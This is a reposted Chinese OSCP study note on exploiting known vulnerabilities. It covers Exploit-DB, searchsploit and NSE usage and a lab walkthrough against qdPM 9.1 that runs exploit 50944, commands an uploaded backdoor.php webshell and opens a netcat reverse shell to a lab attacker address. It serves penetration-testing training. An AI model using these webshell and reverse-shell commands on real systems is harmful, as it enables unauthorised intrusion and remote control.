文章总结: 本文介绍了OSCP学习中的已知漏洞利用部分,包括在线漏洞利用库如Exploit-DB和PacketStorm的使用方法,离线漏洞利用库如MSF和SearchSploit的应用,以及NSE脚本插件的使用。文章通过qdPM9.1的实际案例演示了如何发现漏洞、搜索利用代码并执行攻击的全过程,为OSCP学习者提供了实用的漏洞利用技能指导。
综合评分: 84
文章分类: 渗透测试,漏洞分析,WEB安全,红队,安全工具
OSCP | 已知漏洞利用
原创
小A法师
高级红队专家
2024年6月28日 06:49
北京
教材和学习方式详见开篇:OSCP学习之路-开篇
本篇对应教材第12章,主要内容“在线exp库”、“离线exp库”、“漏洞利用”,记录使用工具和命令
12.2 在线exp库
网站
https://www.exploit-db.com/https://packetstormsecurity.com/https://github.com/firefox --search "Microsoft Edge site:exploit-db.com"
12.3 离线exp库
12.3.1 MSF
12.3.2 SearchSploit
升级库
sudo apt update && sudo apt install exploitdb
查看exp库文件
ls -1 /usr/share/exploitdb/ls -1 /usr/share/exploitdb/exploits
搜索制定漏洞exp
searchsploit remote smb microsoft windows
拷贝到当前目录
searchsploit -m windows/remote/48537.pysearchsploit -m 42031
12.3.3 NSE脚本插件
grep Exploits /usr/share/nmap/scripts/*.nsenmap --script-help=clamav-exec.nse
12.4 漏洞利用
12.4.1 漏洞利用
发现web应用程序
<div class="copyright"> <a href="http://qdpm.net" target="_blank">qdPM 9.1</a> <br /> Copyright © 2022 <a href="http://qdpm.net" target="_blank">qdpm.net</a></div>
exploit-db上搜索“qdPM 9.1”
searchsploit -m 50944
python3 50944.py -url http://192.168.50.11/project/ -u [email protected] -p AIDevCorpcurl http://192.168.50.11/project/uploads/users/420919-backdoor.php?cmd=whoamicurl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=which nc"nc -lvnp 6666curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=nc -nv 192.168.50.129 6666 -e /bin/bash"
我在第一篇里提到的一些有价值的认证,还有什么质量高的认证考试我没想到的,可以私我
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:高级红队专家 小A法师《OSCP | 已知漏洞利用》